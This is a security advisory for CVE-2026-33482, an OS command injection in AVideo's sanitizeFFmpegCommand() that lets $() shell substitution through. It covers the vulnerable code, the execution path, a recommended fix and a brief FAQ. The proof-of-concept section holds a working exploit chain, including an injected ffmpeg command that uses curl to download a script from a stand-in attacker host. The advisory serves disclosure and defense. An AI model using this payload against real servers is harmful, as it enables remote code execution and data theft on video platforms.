CVE-2026-33482: AVideo has an OS Command Injection via $() Shell Substitution Bypass in sanitizeFFmpegCommand()
Summary
The sanitizeFFmpegCommand() function in plugin/API/standAlone/functions.php is designed to prevent OS command injection in ffmpeg commands by stripping dangerous shell metacharacters (&&, ;, |, , <, >). However, it fails to strip $() (bash command substitution syntax). Since the sanitized command is executed inside a double-quoted sh -c context in execAsync(), an attacker who can craft a valid encrypted payload can achieve arbitrary command execution on the standalone encoder server.
Details
Vulnerable sanitization function (plugin/API/standAlone/functions.php:59-82):
php function sanitizeFFmpegCommand($command) { $allowedPrefixes = ['ffmpeg', '/usr/bin/ffmpeg', '/bin/ffmpeg']; // Remove dangerous characters $command = strreplace('&&', '', $command); $command = pregreplace('/\s&?>.(?:2>&1)?/', '', $command); $command = pregreplace('/[;|<>]/', '', $command); // Missing: $ ( ) \n // Ensure it starts with an allowed prefix foreach ($allowedPrefixes as $prefix) { if (strpos(trim($command), $prefix) === 0) { return $command; } } return ''; }
The character class [;|<>] on line 70 does not include $, (, ), or \n. This means $(...) command substitution passes through completely unmodified.
Execution sink (objects/functionsExec.php:656-658):
php $commandWithKeyword = "nohup sh -c \"$command & echo \\$! > /tmp/$keyword.pid\" > /dev/null 2>&1 &";
The addcslashes($command, '"') call at line 639 only escapes double-quote characters. The $() construct is preserved intact and interpreted by sh as command substitution within the double-quoted string.
Execution flow: 1. Attacker sends codeToExecEncrypted parameter to plugin/API/standAlone/ffmpeg.json.php 2. Standalone encoder calls main server's unauthenticated decryptString API to decrypt 3. Decrypted ffmpegCommand passes through sanitizeFFmpegCommand() — $() is NOT stripped 4. Command passes prefix check (starts with ffmpeg) 5. execAsync() wraps it in sh -c "..." — $() is evaluated as command substitution
Auth barrier analysis: - Requires a valid AES-256-CBC encrypted JSON payload with a timestamp within 30 seconds - Key is sha256(saltV2) on the main server; saltV2 is generated by randombytes(16) — cryptographically strong - IV is substr(sha256(systemRootPath), 0, 16) — predictable but insufficient alone - On legacy installations without saltV2, falls back to $global['salt'] which may be weaker - The decryptString API endpoint (API.php:5963) is unauthenticated, enabling probing but not payload crafting
PoC
Assuming the attacker has obtained the encryption key (e.g., from a leaked configuration file, a legacy installation with a weak salt, or via a separate vulnerability):
bash Step 1: Craft the malicious ffmpeg command $() passes sanitization; curl -o avoids needing > which would be stripped MALICIOUSCMD='ffmpeg $(curl http://attacker.example.com/shell.sh -o /tmp/s.sh) -i /dev/null /tmp/out.mp4'
Step 2: Build the JSON payload PAYLOAD="{\"ffmpegCommand\":\"$MALICIOUSCMD\",\"keyword\":\"test\",\"time\":$(date +%s)}"
Step 3: Encrypt the payload (requires knowledge of salt and systemRootPath) KEY = sha256(saltV2) IV = substr(sha256(systemRootPath), 0, 16) ENCRYPTED=$(php -r " \$salt = 'KNOWNSALTV2'; \$ivsource = '/var/www/html/AVideo/'; \$key = hash('sha256', \$salt); \$iv = substr(hash('sha256', \$ivsource), 0, 16); echo base64encode(opensslencrypt('$PAYLOAD', 'AES-256-CBC', \$key, 0, \$iv)); ")
Step 4: Send to standalone encoder curl "http://standalone-encoder.example.com/plugin/API/standAlone/ffmpeg.json.php?codeToExecEncrypted=$(python3 -c 'import urllib.parse; print(urllib.parse.quote(\"'$ENCRYPTED'\"))')"
Result: The standalone encoder executes: sh -c "ffmpeg $(curl http://attacker.example.com/shell.sh -o /tmp/s.sh) -i /dev/null /tmp/out.mp4 ..." The $(curl ...) is evaluated BEFORE ffmpeg runs, downloading the attacker's script
Sanitization trace for the payload: - strreplace('&&', '', ...) → no && present, passes - pregreplace('/\s&?>.(?:2>&1)?/', '', ...) → no > outside $(), passes - pregreplace('/[;|<>]/', '', ...) → no ;|<> present, passes - Prefix check → starts with ffmpeg, passes - addcslashes($command, '"') → no " in payload, $() untouched
Impact
- Remote Code Execution: Full arbitrary command execution on the standalone encoder server with the privileges of the web server process - Lateral Movement: Standalone encoders typically have network access to the main AVideo server, enabling further attacks - Data Exfiltration: Access to all video files, configuration, and credentials stored on the encoder - Service Disruption: Attacker can terminate encoding processes or consume system resources
The attack complexity is High due to the encryption key requirement, but the impact is Critical once the barrier is bypassed. Legacy installations without saltV2 are at significantly higher risk.
Recommended Fix
Replace the denylist-based sanitization with proper argument escaping:
php function sanitizeFFmpegCommand($command) { $allowedPrefixes = ['ffmpeg', '/usr/bin/ffmpeg', '/bin/ffmpeg'];
// Verify it starts with an allowed prefix $trimmed = trim($command); $validPrefix = false; foreach ($allowedPrefixes as $prefix) { if (strpos($trimmed, $prefix) === 0) { $validPrefix = true; break; } } if (!$validPrefix) { errorlog("Sanitization failed: Command does not start with an allowed prefix"); return ''; }
// Strip ALL shell metacharacters, including command substitution // This covers: ; | < > $ ( ) { } \n \r $command = pregreplace('/[;|<>$(){}\\\\]/', '', $command); $command = strreplace('&&', '', $command); $command = pregreplace('/[\n\r]/', '', $command); $command = pregreplace('/\s&?>.(?:2>&1)?/', '', $command);
errorlog("Command sanitized successfully"); return $command; }
Better long-term fix: Instead of sanitizing a complete shell command string, parse the ffmpeg arguments and use escapeshellarg() on each individual argument before reassembling the command. This eliminates the need for a denylist entirely.
Other sources
WWBN AVideo is an open source video platform. In versions up to and including 26.0, the sanitizeFFmpegCommand() function in plugin/API/standAlone/functions.php is designed to prevent OS command injection in ffmpeg commands by stripping dangerous shell metacharacters (&&, ;, |, , <, >). However, it fails to strip $() (bash command substitution syntax). Since the sanitized command is executed inside a double-quoted sh -c context in execAsync(), an attacker who can craft a valid encrypted payload can achieve arbitrary command execution on the standalone encoder server. Commit 25c8ab90269e3a01fb4cf205b40a373487f022e1 contains a patch.
— MITRE
Affected Software
Remediation
Event History
Frequently Asked Questions
What does an attacker need to exploit this issue?
The described attack requires a crafted valid encrypted payload containing shell command substitution syntax. The available data does not specify how an attacker obtains or creates a valid encrypted payload.
Which systems are exposed to command execution?
The command execution occurs on the standalone encoder server where the sanitized ffmpeg command is run through sh -c. Systems not using that standalone encoder execution path are not identified as affected by the provided data.
What should be done if the issue is present?
A patch is available. The provided information does not describe a configuration-only workaround or other compensating control.